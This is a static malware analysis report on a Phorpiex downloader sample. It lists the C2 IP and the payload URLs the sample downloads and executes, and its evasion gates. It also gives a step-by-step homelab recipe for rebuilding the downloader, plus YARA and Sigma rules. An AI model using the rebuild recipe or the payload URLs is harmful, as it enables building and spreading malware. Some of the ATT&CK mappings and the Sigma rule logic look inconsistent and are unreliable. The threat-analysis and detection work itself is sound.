0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3phorpiex: 0371fbbf — Business-app masquerade downloader sibling (May 29 2026 build)
Executive Summary
A 113 KB MSVC 9.0 PE32 GUI downloader compiled 2026-05-29, three days after the first confirmed business-app masquerade sibling (9570038453). Shares the same C2 (178.16.54.109), the same six hardcoded masquerade process names (slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe), the same %TEMP%\w4f4wffwf.txt marker-file gate, and the same Chrome/7775543322.0.0.0 fake UA. Delta: adds lkdomain.exe as a primary payload URL and ten sequentially-named payloads (lb1.exe–lb10.exe), blending the business-app masquerade pattern with the thin-downloader payload-naming convention observed in earlier Phorpiex siblings. Static-only analysis (CAPE skipped — no Windows guest).
What It Is
| Field | Value |
|---|---|
| SHA-256 | 0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3 |
| Size | 113,152 bytes (113 KB) ^[file.txt] |
| Type | PE32 executable (GUI) Intel 80386, 5 sections ^[file.txt] |
| Linker | MSVC 9.0 (MajorLinkerVersion 0x9, Minor 0x0) ^[pefile.txt] |
| Timestamp | 0x6A1965F9 → Fri May 29 10:10:01 2026 UTC ^[pefile.txt] |
| Subsystem | Windows GUI ^[pefile.txt] |
| Signed | No ^[rabin2-info.txt] |
| ASLR / NX | Enabled (DllCharacteristics 0x8140) ^[pefile.txt] |
| Rich header | Present (oRichv8 in strings) ^[strings.txt:3] |
| CRT | Static MSVCR90 (Dinkumware C++ stdlib strings) ^[strings.txt:400] |
| YARA | PE_File_Generic, Suspicious_Wininet_Imports ^[yara.txt] |
How It Works
Entry flow
Standard MSVC CRT entry0 → main with SEH frames. main gates execution through a GetTickCount → fcn.00405baa timing loop (anti-emulation) before proceeding to the downloader logic. ^[r2:entry0] ^[r2:main]
Marker-file gate
fcn.004010b0 expands %temp%, constructs %TEMP%\w4f4wffwf.txt, and checks existence via PathFileExistsW. If absent, it creates the file and returns true (1); if present, returns false (0), causing main to skip the download loop. This is a single-instance / sandbox-evasion gate. ^[r2:fcn.004010b0] ^[strings.txt:51]
Geolocation gate
main fetches http://ip-api.com/json/ via WinInet, then parses the JSON response for "countryCode". If the value is "CN", execution aborts. This is an explicit China exclusion gate. ^[r2:main] ^[strings.txt:70] ^[strings.txt:72]
Downloader loop
fcn.00401150 is the core fetch-and-stage routine:
- Expands
%temp%to a wide path. - Generates a random numeric filename
%TEMP%\<rand><rand>.exeviawsprintfW("%s\\%d%d.exe"). ^[r2:fcn.00401150] - Opens a WinInet session with a hardcoded fake UA:
Mozilla/5.0 ... Chrome/7775543322.0.0.0 Safari/537.36. ^[strings.txt:51] - Fetches the payload via
InternetOpenUrlW+InternetReadFile. - Writes the payload to the temp path via
CreateFileW+WriteFile. - Deletes the
Zone.IdentifierADS viaDeleteFileW("%s:Zone.Identifier")to strip the "downloaded from Internet" mark. ^[r2:fcn.00401150] - Executes the payload via
CreateProcessW(withCREATE_UNICODE_ENVIRONMENT|DEBUG_PROCESS? — flag0x44observed) falling back toShellExecuteW("open"). ^[r2:section..text@0x401082]
Payload URL list
Eleven hardcoded HTTP URLs, all pointing to 178.16.54.109:
http://178.16.54.109/lkdomain.exe^[strings.txt:50]http://178.16.54.109/lb1.exethroughlb10.exe^[strings.txt:57-66]
Masquerade execution names
Six hardcoded process names passed as the lpApplicationName / lpFileName parameter to the execution stub:
slack.exe,Teams.exe,Zoom.exe,sapgui.exe,PBIDesktop.exe,tableau.exe^[strings.txt:51-56]
These are not the downloaded payload's real name; they are the name under which the dropper launches itself or a companion, likely to poison EDR process-tree telemetry.
Decompiled Behavior
Entry point (entry0 @ 0x00407db1): Standard MSVC 9.0 CRT bootstrap — validates PE magic, initializes _initterm, sets up argv/envp, then calls main. No initterm hijack observed (unlike the older 755bed07 Phorpiex sibling). ^[r2:entry0]
main (0x004016a0):
- Sleep(2000) → GetTickCount gate → marker-file check (
fcn.004010b0) → ip-api fetch → JSON"countryCode"parse → CN exclusion → iterate payload URL table → call downloader (fcn.00401150) for each URL. ^[r2:main]
fcn.00401150 (downloader): WinInet-only fetch (no URLMon fallback, unlike the thin 10 KB stubs). Stages to %TEMP%\<rand><rand>.exe. Strip Zone.Identifier. Launch via CreateProcessW then ShellExecuteW. ^[r2:fcn.00401150]
fcn.00401082 (launcher): Called after download completes. Attempts CreateProcessW with DEBUG_PROCESS flag; on failure falls back to ShellExecuteW("open", ...), then sleeps 1000 ms before returning. ^[r2:section..text@0x401082]
C2 Infrastructure
| Indicator | Value | Provenance |
|---|---|---|
| Primary C2 IP | 178.16.54.109 |
^[strings.txt:50] ^[strings.txt:57-66] |
| Geolocation API | http://ip-api.com/json/ |
^[strings.txt:70] ^[strings.txt:75] |
| User-Agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7775543322.0.0.0 Safari/537.36 |
^[strings.txt:51] |
| Payload URLs | lkdomain.exe, lb1.exe–lb10.exe |
^[strings.txt:50] ^[strings.txt:57-66] |
| Masquerade names | slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe |
^[strings.txt:51-56] |
| Marker file | %TEMP%\w4f4wffwf.txt |
^[r2:fcn.004010b0] |
No domains, no HTTPS, no DGA. Pure cleartext HTTP over a single hardcoded IP.
Interesting Tidbits
- Builder evolution: Prior thin-downloader siblings (
6b8527a7,025f5798, etc.) usedpeinf.exe/xmr.exe/xmrget.exe/grab.exepayload names. The business-app masquerade sibling (9570038453) did not list payload URLs in its summary. This sample (0371fbbf) is the first confirmed bridge: it carries the business-app masquerade names and thelb*sequential payload naming convention. Thelkdomain.exeURL is new to this campaign window. ^[entities/phorpiex.md] - Fake UA version:
Chrome/7775543322.0.0.0— same impossible version as the prior sibling, confirming a shared builder template. ^[strings.txt:51] - No URLMon: The 10 KB thin stubs use dual WinInet+URLMon fetch; this 113 KB variant uses WinInet only. The bloat comes from static C++ STL (Dinkumware strings, iostream RTTI) rather than additional functionality. ^[binwalk.txt]
- Sleep gate:
mainsleeps 2000 ms and runs aGetTickCountdelta check before any network activity — crude anti-emulation. ^[r2:main] - CN exclusion: Hardcoded country-code gate excludes China. Common in crimeware to avoid domestic law-enforcement attention. ^[r2:main]
How To Mess With It (Homelab Replication)
Toolchain: MSVC 9.0 (Visual Studio 2008) or compatible MinGW-w64 with -static CRT.
Recipe:
- Write a minimal Win32 GUI app in C++ using
WinInetAPIs (InternetOpenW,InternetOpenUrlW,InternetReadFile). - Hardcode
Sleep(2000)+GetTickCount()delta check atmainentry. - Implement
ExpandEnvironmentStringsW(L"%temp%")+PathFileExistsW(L"w4f4wffwf.txt")gate. - Fetch
http://ip-api.com/json/, parse"countryCode", abort if"CN". - Build a
wchar_t*URL table pointing tohttp://<ip>/lb<N>.exe. - Generate random filename with
wsprintfW(dst, L"%s\\%d%d.exe", temp, rand(), rand()). - Open WinInet session with
InternetOpenW(L"Mozilla/5.0 ... Chrome/7775543322.0.0.0 ...", ...). - Download →
CreateFileW→WriteFile→DeleteFileW(L"path:Zone.Identifier")→CreateProcessW/ShellExecuteW(L"open"). - Compile with
/SUBSYSTEM:WINDOWS /MT(static CRT). Target size should be ~100–120 KB with STL bloat.
Verification: Run capa <repro.exe> — should hit Suspicious_Wininet_Imports and PE_File_Generic.
Deployable Signatures
YARA rule
rule Phorpiex_BusinessAppDownloader_May2026 {
meta:
description = "Phorpiex business-app masquerade downloader cluster (May 2026)"
author = "PacketPursuit SOC"
date = "2026-08-27"
hash1 = "0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3"
hash2 = "9570038453a8b3caa9e7a0af56ef77cee9cfb314c357e62f4350fb99f6afc51f"
strings:
$ua = "Chrome/7775543322.0.0.0" ascii wide
$marker = "w4f4wffwf.txt" ascii wide
$c2 = "178.16.54.109" ascii wide
$slack = "slack.exe" ascii wide
$teams = "Teams.exe" ascii wide
$zoom = "Zoom.exe" ascii wide
$sap = "sapgui.exe" ascii wide
$pbi = "PBIDesktop.exe" ascii wide
$tableau = "tableau.exe" ascii wide
$zone = ":Zone.Identifier" ascii wide
$ipapi = "http://ip-api.com/json/" ascii wide
$cc = "countryCode" ascii wide
$cn = "CN" ascii wide
condition:
uint16(0) == 0x5A4D and
filesize < 200KB and
6 of ($slack, $teams, $zoom, $sap, $pbi, $tableau) and
($ua or $marker or $c2)
}
Sigma rule
title: Phorpiex Business-App Masquerade Downloader Execution
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'slack.exe'
- 'Teams.exe'
- 'Zoom.exe'
- 'sapgui.exe'
- 'PBIDesktop.exe'
- 'tableau.exe'
ParentImage|endswith:
- '\temp\\'
Image|endswith:
- '\temp\\'
condition: selection
falsepositives:
- Unlikely — these exact names appearing under %TEMP% with ParentImage also in %TEMP% is a strong signal.
level: high
IOC list
| Type | Value |
|---|---|
| SHA-256 | 0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3 |
| SHA-256 sibling | 9570038453a8b3caa9e7a0af56ef77cee9cfb314c357e62f4350fb99f6afc51f |
| C2 IP | 178.16.54.109 |
| Marker file | %TEMP%\w4f4wffwf.txt |
| Fake UA | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7775543322.0.0.0 Safari/537.36 |
| Payload names | lkdomain.exe, lb1.exe–lb10.exe |
| Masquerade names | slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe |
Behavioral fingerprint
This binary is a 100–120 KB MSVC 9.0 PE32 GUI executable with static C++ STL bloat. On launch it sleeps 2 seconds, checks for a marker file %TEMP%\w4f4wffwf.txt, queries ip-api.com/json for geolocation, and aborts if the country code is "CN". It then downloads up to eleven payloads over cleartext HTTP from 178.16.54.109 (URLs like /lb<N>.exe and /lkdomain.exe), stages them to %TEMP%\<rand><rand>.exe, strips the Zone.Identifier ADS, and launches them under masquerade process names including slack.exe, Teams.exe, and Zoom.exe. The WinInet session uses a fake Chrome UA with an impossible version string (Chrome/7775543322.0.0.0).
Detection Signatures
Static indicators map to MITRE ATT&CK as follows:
| Technique | ID | Evidence |
|---|---|---|
| User Execution | T1204.002 | Spam-delivered PE with social-engineered filename |
| Ingress Tool Transfer | T1105 | HTTP download of secondary payloads ^[strings.txt:50] ^[strings.txt:57-66] |
| Masquerading | T1036 | Process launched as slack.exe, Teams.exe, etc. ^[strings.txt:51-56] |
| Exfiltration Over C2 | T1041 | HTTP cleartext C2 ^[strings.txt:50] |
| System Information Discovery | T1082 | ip-api.com/json geolocation query ^[strings.txt:70] |
| Geolocation | T1617 | Country-code gating (countryCode, CN) ^[r2:main] |
| Defense Evasion::Indicator Removal | T1070.004 | Zone.Identifier ADS deletion ^[r2:fcn.00401150] |
| Defense Evasion::Anti-Analysis | T1497 | GetTickCount timing gate + marker-file single-instance gate ^[r2:main] ^[r2:fcn.004010b0] |
References
- SHA-256:
0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3 - Sibling analysis:
9570038453a8b3caa9e7a0af56ef77cee9cfb314c357e62f4350fb99f6afc51f - Wiki: phorpiex
- OpenCTI labels:
dropped-by-phorpiex,exe,malware-bazaar
Provenance
- Static artifacts generated by triage-fast (file, exiftool, pefile, strings, yara, ssdeep, tlsh, binwalk, rabin2-info)
strings.txtline numbers cited directlypefile.txtfor PE header fieldsrabin2-info.txtfor radare2 binary summary- Decompilation via radare2 MCP (functions
entry0,main,fcn.004010b0,fcn.00401150,fcn.00401082) - capa skipped (signature path missing on triage host); floss skipped (CLI arg bug)
- No CAPE detonation — Windows guest unavailable at time of analysis